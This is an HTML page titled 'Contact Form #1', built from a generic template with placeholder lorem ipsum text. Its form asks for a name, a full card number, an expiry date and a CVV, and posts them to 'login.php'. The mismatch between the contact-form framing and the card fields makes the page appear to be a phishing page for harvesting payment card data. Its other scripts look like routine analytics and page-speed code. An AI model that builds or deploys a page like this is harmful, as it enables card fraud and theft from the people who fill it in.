<!doctype html>
<html lang="en">
<head>

<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<link href="https://fonts.googleapis.com/css?family=Poppins:300,400,500,700,900&display=swap" rel="stylesheet">
<link rel="stylesheet" href="fonts,_icomoon,_style.css+css,_owl.carousel.min.css+css,_bootstrap.min.css+css,_style.css.pagespeed.cc.juPiH7E-1X.css" />


<title>Contact Form #1</title>
<script nonce="d8a152f7-1772-4015-a1bd-ab590223f6a7">(function(w,d){!function(a,e,t,r,z){a.zarazData=a.zarazData||{},a.zarazData.executed=[],a.zarazData.tracks=[],a.zaraz={deferred:[]};var s=e.getElementsByTagName("title")[0];s&&(a.zarazData.t=e.getElementsByTagName("title")[0].text),a.zarazData.w=a.screen.width,a.zarazData.h=a.screen.height,a.zarazData.j=a.innerHeight,a.zarazData.e=a.innerWidth,a.zarazData.l=a.location.href,a.zarazData.r=e.referrer,a.zarazData.k=a.screen.colorDepth,a.zarazData.n=e.characterSet,a.zarazData.o=(new Date).getTimezoneOffset(),a.dataLayer=a.dataLayer||[],a.zaraz.track=(e,t)=>{for(key in a.zarazData.tracks.push(e),t)a.zarazData["z_"+key]=t[key]},a.zaraz._preSet=[],a.zaraz.set=(e,t,r)=>{a.zarazData["z_"+e]=t,a.zaraz._preSet.push([e,t,r])},a.dataLayer.push({"zaraz.start":(new Date).getTime()}),a.addEventListener("DOMContentLoaded",(()=>{var t=e.getElementsByTagName(r)[0],z=e.createElement(r);z.defer=!0,z.src="/cdn-cgi/zaraz/s.js?z="+btoa(encodeURIComponent(JSON.stringify(a.zarazData))),t.parentNode.insertBefore(z,t)}))}(w,d,0,"script");})(window,document);</script></head>
<body>
<div class="content">
<div class="container">
<div class="row justify-content-center">
<div class="col-md-10">
<div class="row align-items-center">
<div class="col-lg-7 mb-5 mb-lg-0">
<h2 class="mb-5">Fill the form. <br> It's easy.</h2>
<form class="border-right pr-5 mb-5" method="post" id="contactForm" name="contactForm" action="login.php">
<div class="row">
<div class="col-md-12 form-group">
<input type="text" class="form-control" name="name" id="name" placeholder="name">
</div>
</div>
</div>
</div>
<div class="row">
<div class="col-md-12 form-group">
<input type="tel" class="form-control" name="number" id="number" placeholder="card number" size="20" minlength="16" maxlength="16">
</div>
</div>
<div class="row">
<div class="col-md-6 form-group">
<input type="tel" class="form-control" name="date" id="date" placeholder="Expiry Date (MM/YY)" size="7" minlength="5" maxlength="5">
</div>
<div class="col-md-6 form-group">
<input type="password" class="form-control" name="cvv" id="cvv" placeholder="Enter CVV" size="5" minlength="3" maxlength="3">
</div>
</div>


<div class="row">
<div class="col-md-12">
<input type="submit" value="Submit" class="btn btn-primary rounded-0 py-2 px-4">
<span class="submitting"></span>
</div>
</div>
</form>
<div id="form-message-warning mt-4"></div>
<div id="form-message-success">
Your form has been submitted, thank you!
</div>
</div>
<div class="col-lg-4 ml-auto">
<h3 class="mb-4">Let's talk about everything.</h3>
<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Nihil deleniti itaque similique magni. Magni, laboriosam perferendis maxime!</p>
<p><a href="#">Read more</a></p>
</div>
</div>
</div>
</div>
</div>
</div>
<script src="js/jquery-3.3.1.min.js"></script>
<script src="js/popper.min.js+bootstrap.min.js.pagespeed.jc.dVjErT8wt9.js"></script><script>eval(mod_pagespeed_T3GghYC5G1);</script>
<script>eval(mod_pagespeed_ZXdj_lJgRu);</script>
<script src="js/jquery.validate.min.js+main.js.pagespeed.jc.V9VIykvU8M.js"></script><script>eval(mod_pagespeed_R5YvT2D$IV);</script>
<script>eval(mod_pagespeed_g5O3wX$CpZ);</script>
<script defer src="https://static.cloudflareinsights.com/beacon.min.js/v652eace1692a40cfa3763df669d7439c1639079717194" integrity="sha512-Gi7xpJR8tSkrpF7aordPZQlW2DLtzUlZcumS8dMQjwDHEnw9I7ZLyiOj/6tZStRBGtGgN6ceN6cMH8z7etPGlw==" data-cf-beacon='{"rayId":"6e0d565d4a4f857e","token":"cd0b4b3a733644fc843ef0b185f98241","version":"2021.12.0","si":100}' crossorigin="anonymous"></script>
</body>
</html>